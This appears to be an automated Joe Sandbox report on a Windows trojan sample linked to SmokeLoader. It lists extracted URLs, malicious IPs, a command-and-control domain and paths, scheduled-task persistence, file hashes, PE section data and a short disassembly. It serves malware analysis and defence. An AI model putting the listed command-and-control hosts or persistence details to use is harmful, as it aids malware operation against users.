                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://excel.office.comexplorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.microexplorer.exe, 00000001.00000000.1762412862.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1764601072.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1761761015.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://api.msn.com/qexplorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1767121349.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1767121349.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://word.office.comexplorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.micrexplorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1763031463.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://api.msn.com/explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://outlook.com_explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            58.151.148.90
                                                                            unknownKorea Republic of
                                                                            17858POWERVIS-AS-KRLGPOWERCOMMKRtrue
                                                                            189.161.95.103
                                                                            nwgrus.ruMexico
                                                                            8151UninetSAdeCVMXtrue
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1532852
                                                                            Start date and time:2024-10-14 01:51:07 +02:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 8m 6s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:6
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:1HGXcC63iu.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:8320df18fc9660f3a4dcaa29b3707847.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@2/2@3/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 38
                                                                            • Number of non-executed functions: 13
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • VT rate limit hit for: 1HGXcC63iu.exe
                                                                            TimeTypeDescription
                                                                            00:52:26Task SchedulerRun new task: Firefox Default Browser Agent 44001E79D4D76CAA path: C:\Users\user\AppData\Roaming\scjabht
                                                                            19:52:26API Interceptor428054x Sleep call for process: explorer.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            58.151.148.90veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • nwgrus.ru/tmp/index.php
                                                                            oRKal761Qm.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                                                            • 100xmargin.com/tmp/index.php
                                                                            file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                            • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                                            n72I7qB2ss.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • mzxn.ru/tmp/index.php
                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • gebeus.ru/tmp/index.php
                                                                            cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • gebeus.ru/tmp/index.php
                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • gebeus.ru/tmp/index.php
                                                                            file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                                            • gebeus.ru/tmp/index.php
                                                                            2gQsoHaGEm.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                            • dbfhns.in/tmp/index.php
                                                                            QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                            • dbfhns.in/tmp/index.php
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            nwgrus.ruK80v6DHFHE.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 148.230.249.9
                                                                            FyDBXJE74v.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 78.89.199.216
                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 63.143.98.185
                                                                            fTKQwp8fRa.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 78.89.199.216
                                                                            LgigaSKsL6.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 190.224.203.37
                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 190.147.128.172
                                                                            mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 119.204.11.2
                                                                            uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 190.224.203.37
                                                                            wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 116.58.10.60
                                                                            bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 190.147.2.86
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            POWERVIS-AS-KRLGPOWERCOMMKRarm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 125.186.137.226
                                                                            debug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 180.227.248.35
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 115.136.128.86
                                                                            SecuriteInfo.com.Linux.Siggen.9999.5011.20467.elfGet hashmaliciousMiraiBrowse
                                                                            • 122.41.44.130
                                                                            YsI7t2OC5q.elfGet hashmaliciousMiraiBrowse
                                                                            • 58.148.206.11
                                                                            ULRmk7oYR7.elfGet hashmaliciousMiraiBrowse
                                                                            • 116.47.196.33
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 119.68.28.203
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 112.148.254.244
                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                            • 125.242.176.130
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 180.231.63.183
                                                                            UninetSAdeCVMXspc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 201.126.250.101
                                                                            o5DbX8v3ZW.elfGet hashmaliciousMiraiBrowse
                                                                            • 200.64.188.89
                                                                            m0mg1WH7Su.elfGet hashmaliciousMiraiBrowse
                                                                            • 189.248.128.72
                                                                            YsI7t2OC5q.elfGet hashmaliciousMiraiBrowse
                                                                            • 201.136.108.169
                                                                            yQMBCvJVWp.elfGet hashmaliciousMiraiBrowse
                                                                            • 201.123.121.206
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 187.214.154.128
                                                                            GGXhCiYFBw.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                            • 187.194.22.140
                                                                            uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            • 187.199.203.72
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 148.223.164.73
                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                            • 187.234.29.99
                                                                            No context
                                                                            No context
                                                                            Process:C:\Windows\explorer.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):275456
                                                                            Entropy (8bit):5.751648146553764
                                                                            Encrypted:false
                                                                            SSDEEP:3072:O9PTmSohCYWK7JSuGdngqp7U+L5ACyxF9Dav3xvZtWluUCIqzpjAqMi:gYhcOIuGdngq58/4JZoluVIqzpjAqh
                                                                            MD5:8320DF18FC9660F3A4DCAA29B3707847
                                                                            SHA1:1EC0AFCCEAE9B6B0A771F28002B3617D45D5AB56
                                                                            SHA-256:CE39271335727CB252102E59F53DEDB8880FB3DCA8F597BDF7E5D35C6D605DE0
                                                                            SHA-512:A4A47B83FA644BB403CF2CF43CDA6357CE6149D874EE7549B6D0BA02E8BD31E3128F6546EA7ED1A225AC3DF70E3EB50848FDC859542C2F670F71F780A408017B
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................U.c......q......`.......v......E.....................a......d....Rich...................PE..L.....Xe.................j....s.....".............@...........................t.....8F......................................\...P....Pr..-...........................................................................................................text....i.......j.................. ..`.rdata...!......."...n..............@..@.data.....p.........................@....jekin...D....q..8..................@....zidisi..(... r..(..................@....rsrc....-...Pr.....................@..@................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\explorer.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):5.751648146553764
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                            • InstallShield setup (43055/19) 0.43%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:1HGXcC63iu.exe
                                                                            File size:275'456 bytes
                                                                            MD5:8320df18fc9660f3a4dcaa29b3707847
                                                                            SHA1:1ec0afcceae9b6b0a771f28002b3617d45d5ab56
                                                                            SHA256:ce39271335727cb252102e59f53dedb8880fb3dca8f597bdf7e5d35c6d605de0
                                                                            SHA512:a4a47b83fa644bb403cf2cf43cda6357ce6149d874ee7549b6d0ba02e8bd31e3128f6546ea7ed1a225ac3df70e3eb50848fdc859542c2f670f71f780a408017b
                                                                            SSDEEP:3072:O9PTmSohCYWK7JSuGdngqp7U+L5ACyxF9Dav3xvZtWluUCIqzpjAqMi:gYhcOIuGdngq58/4JZoluVIqzpjAqh
                                                                            TLSH:8444F68163A1AC13EFB64B324E39D9942A7EBC625E7572DFF104760F187B1A1E413B12
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................U.c.......q.......`.......v......E........................a.......d.....Rich....................PE..L.....Xe...
                                                                            Icon Hash:17614cb2b24d2117
                                                                            Entrypoint:0x401a22
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6558C78F [Sat Nov 18 14:17:51 2023 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:0
                                                                            File Version Major:5
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:dc51987737c4af4f71f5c3733cf2b1f2
                                                                            Instruction
                                                                            call 00007F8BAC8173D2h
                                                                            jmp 00007F8BAC813C4Dh
                                                                            mov edi, edi
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            sub esp, 00000328h
                                                                            mov dword ptr [0041C650h], eax
                                                                            mov dword ptr [0041C64Ch], ecx
                                                                            mov dword ptr [0041C648h], edx
                                                                            mov dword ptr [0041C644h], ebx
                                                                            mov dword ptr [0041C640h], esi
                                                                            mov dword ptr [0041C63Ch], edi
                                                                            mov word ptr [0041C668h], ss
                                                                            mov word ptr [0041C65Ch], cs
                                                                            mov word ptr [0041C638h], ds
                                                                            mov word ptr [0041C634h], es
                                                                            mov word ptr [0041C630h], fs
                                                                            mov word ptr [0041C62Ch], gs
                                                                            pushfd
                                                                            pop dword ptr [0041C660h]
                                                                            mov eax, dword ptr [ebp+00h]
                                                                            mov dword ptr [0041C654h], eax
                                                                            mov eax, dword ptr [ebp+04h]
                                                                            mov dword ptr [0041C658h], eax
                                                                            lea eax, dword ptr [ebp+08h]
                                                                            mov dword ptr [0041C664h], eax
                                                                            mov eax, dword ptr [ebp-00000320h]
                                                                            mov dword ptr [0041C5A0h], 00010001h
                                                                            mov eax, dword ptr [0041C658h]
                                                                            mov dword ptr [0041C554h], eax
                                                                            mov dword ptr [0041C548h], C0000409h
                                                                            mov dword ptr [0041C54Ch], 00000001h
                                                                            mov eax, dword ptr [0041B008h]
                                                                            mov dword ptr [ebp-00000328h], eax
                                                                            mov eax, dword ptr [0041B00Ch]
                                                                            mov dword ptr [ebp-00000324h], eax
                                                                            call dword ptr [000000D8h]
                                                                            Programming Language:
                                                                            • [C++] VS2008 build 21022
                                                                            • [ASM] VS2008 build 21022
                                                                            • [ C ] VS2008 build 21022
                                                                            • [IMP] VS2005 build 50727
                                                                            • [RES] VS2008 build 21022
                                                                            • [LNK] VS2008 build 21022
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1985c0x50.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x27250000x22dd0.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x180000x19c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x169ef0x16a005017a637cc335af03a6ec36cca92aac4False0.8069319751381215data7.517270263050042IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x180000x21b00x22008f7390606cfa5526c62a62295eb9b3afFalse0.37247242647058826data5.561090816497167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x1b0000x270121c0x16006d8a2d4cce703da056e9061551cb7a55unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .jekin0x271d0000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .zidisi0x27220000x28000x28001276481102f218c981e0324180bafd9fFalse0.00322265625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x27250000x22dd00x22e00c0d08340b10908b7723d0d4308aa5d19False0.3799423163082437data4.837964295754695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_CURSOR0x273d6780x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                            RT_CURSOR0x273d7a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                            RT_CURSOR0x273fd780x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                            RT_CURSOR0x273fea80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                            RT_ICON0x2725b500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5674307036247335
                                                                            RT_ICON0x27269f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6376353790613718
                                                                            RT_ICON0x27272a00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6849078341013825
                                                                            RT_ICON0x27279680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7456647398843931
                                                                            RT_ICON0x2727ed00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.512863070539419
                                                                            RT_ICON0x272a4780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6137429643527205
                                                                            RT_ICON0x272b5200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6163934426229508
                                                                            RT_ICON0x272bea80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7553191489361702
                                                                            RT_ICON0x272c3880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39952025586353945
                                                                            RT_ICON0x272d2300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5
                                                                            RT_ICON0x272dad80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5155529953917051
                                                                            RT_ICON0x272e1a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5635838150289018
                                                                            RT_ICON0x272e7080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.35477178423236516
                                                                            RT_ICON0x2730cb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.3820356472795497
                                                                            RT_ICON0x2731d580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.40614754098360656
                                                                            RT_ICON0x27326e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.42021276595744683
                                                                            RT_ICON0x2732bc00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39285714285714285
                                                                            RT_ICON0x2733a680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5537003610108303
                                                                            RT_ICON0x27343100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6226958525345622
                                                                            RT_ICON0x27349d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                                                            RT_ICON0x2734f400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.425422138836773
